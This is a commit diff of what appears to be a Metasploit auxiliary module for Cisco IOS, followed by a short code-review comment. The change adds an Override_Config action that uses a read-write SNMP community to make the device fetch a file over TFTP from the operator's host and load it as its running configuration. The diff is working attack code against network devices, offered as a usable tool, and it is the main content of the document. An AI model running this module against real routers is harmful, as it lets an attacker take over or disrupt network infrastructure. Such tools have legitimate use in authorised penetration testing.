modify cisco_upload_file to include actions
The default action is Upload_File, which was the original function; the new action Override_Config will override the running config
master
parent
f34314547b
commit
403cf825a8
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'Name' => 'Cisco IOS SNMP File Upload (TFTP)',
|
||||
'Description' => %q{
|
||||
This module will copy file to a Cisco IOS device using SNMP and TFTP.
|
||||
The action override_config will override the running config of the Cisco device.
|
||||
The action Override_Config will override the running config of the Cisco device.
|
||||
A read-write SNMP community is required. The SNMP community scanner module can
|
||||
assist in identifying a read-write community. The target must
|
||||
be able to connect back to the Metasploit system and the use of
|
||||
|
@ -24,7 +24,37 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'pello <fropert[at]packetfault.org>',
|
||||
'ct5595'
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
[
|
||||
'Upload_File',
|
||||
{
|
||||
'Description' => 'Upload the file',
|
||||
'ciscoFlashCopyCommand' => '1.3.6.1.4.1.9.9.10.1.2.1.1.2.',
|
||||
'ciscoFlashCopyProtocol' => '1.3.6.1.4.1.9.9.10.1.2.1.1.3.',
|
||||
'ciscoFlashCopyServerAddress' => '1.3.6.1.4.1.9.9.10.1.2.1.1.4.',
|
||||
'ciscoFlashCopySourceName' => '1.3.6.1.4.1.9.9.10.1.2.1.1.5.',
|
||||
'ciscoFlashCopyDestinationName' => '1.3.6.1.4.1.9.9.10.1.2.1.1.6.',
|
||||
'ciscoFlashCopyEntryStatus' => '1.3.6.1.4.1.9.9.10.1.2.1.1.11.'
|
||||
}
|
||||
],
|
||||
[
|
||||
'Override_Config',
|
||||
{
|
||||
'Description' => 'Override the running config',
|
||||
'ciscoFlashCopyEntryStatus' => '1.3.6.1.4.1.9.9.10.1.2.1.1.11.',
|
||||
'ciscoFlashCopyCommand' => '1.3.6.1.4.1.9.9.10.1.2.1.1.2.',
|
||||
'ccCopyProtocol' => '1.3.6.1.4.1.9.9.96.1.1.1.1.2.',
|
||||
'ccCopySourceFileType' => '1.3.6.1.4.1.9.9.96.1.1.1.1.3.',
|
||||
'ccCopyDestFileType' => '1.3.6.1.4.1.9.9.96.1.1.1.1.4.',
|
||||
'ccCopyServerAddress' => '1.3.6.1.4.1.9.9.96.1.1.1.1.5.',
|
||||
'ccCopyFileName' => '1.3.6.1.4.1.9.9.96.1.1.1.1.6.',
|
||||
'ccCopyEntryRowStatus' => '1.3.6.1.4.1.9.9.96.1.1.1.1.14.'
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultAction' => 'Upload_File'
|
||||
)
|
||||
register_options([
|
||||
OptPath.new('SOURCE', [true, "The filename to upload" ]),
|
||||
|
@ -80,44 +110,61 @@ class MetasploitModule < Msf::Auxiliary
|
|||
begin
|
||||
lhost = datastore['LHOST'] || Rex::Socket.source_address(ip)
|
||||
|
||||
ciscoFlashCopyCommand = "1.3.6.1.4.1.9.9.10.1.2.1.1.2."
|
||||
ciscoFlashCopyProtocol = "1.3.6.1.4.1.9.9.10.1.2.1.1.3."
|
||||
ciscoFlashCopyServerAddress = "1.3.6.1.4.1.9.9.10.1.2.1.1.4."
|
||||
ciscoFlashCopySourceName = "1.3.6.1.4.1.9.9.10.1.2.1.1.5."
|
||||
ciscoFlashCopyDestinationName = "1.3.6.1.4.1.9.9.10.1.2.1.1.6."
|
||||
ciscoFlashCopyEntryStatus = "1.3.6.1.4.1.9.9.10.1.2.1.1.11."
|
||||
|
||||
session = rand(255) + 1
|
||||
|
||||
snmp = connect_snmp
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(6))
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(6))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(5))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(5))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyCommand}#{session}" , SNMP::Integer.new(2))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyCommand']}#{session}" , SNMP::Integer.new(2))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
|
||||
# If the above line didn't throw an error, the host is alive and the community is valid
|
||||
print_status("Copying file #{@filename} to #{ip}...")
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyProtocol}#{session}" , SNMP::Integer.new(1))
|
||||
if(action.name == 'Upload_File')
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyProtocol']}#{session}" , SNMP::Integer.new(1))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyServerAddress}#{session}", SNMP::IpAddress.new(lhost))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyServerAddress']}#{session}", SNMP::IpAddress.new(lhost))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopySourceName}#{session}", SNMP::OctetString.new(@filename))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopySourceName']}#{session}", SNMP::OctetString.new(@filename))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyDestinationName}#{session}", SNMP::OctetString.new(@filename))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyDestinationName']}#{session}", SNMP::OctetString.new(@filename))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(1))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(1))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
elsif(action.name == 'Override_Config')
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopyProtocol']}#{session}" , SNMP::Integer.new(1))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopySourceFileType']}#{session}" , SNMP::Integer.new(1))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopyDestFileType']}#{session}" , SNMP::Integer.new(4))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopyServerAddress']}#{session}", SNMP::IpAddress.new(lhost))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopyFileName']}#{session}", SNMP::OctetString.new(@filename))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopyEntryRowStatus']}#{session}" , SNMP::Integer.new(1))
|
||||
value = snmp.set(varbind)
|
||||
end
|
||||
|
||||
|
||||
# No need to make noise about timeouts
|
||||
|
|
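Review bot: The new `Override_Config` branch in the last hunk sets its SNMP values as bare integers with no comment, and nothing in the metadata visible here records that this action changes the device configuration. I would annotate the values, e.g. `# ccCopyProtocol 1 = tftp, ccCopySourceFileType 1 = networkFile, ccCopyDestFileType 4 = runningConfig`, and declare the effect in the info hash with `'Notes' => { 'SideEffects' => [CONFIG_CHANGES] }`, unless a `Notes` entry already exists outside these hunks. The `if`/`elsif` on `action.name` also has no `else`, so an unexpected action name falls through silently after the shared SETs have already been sent; an `else` branch that reports the unknown action would make that visible. The enclosing method starts and ends outside the hunk.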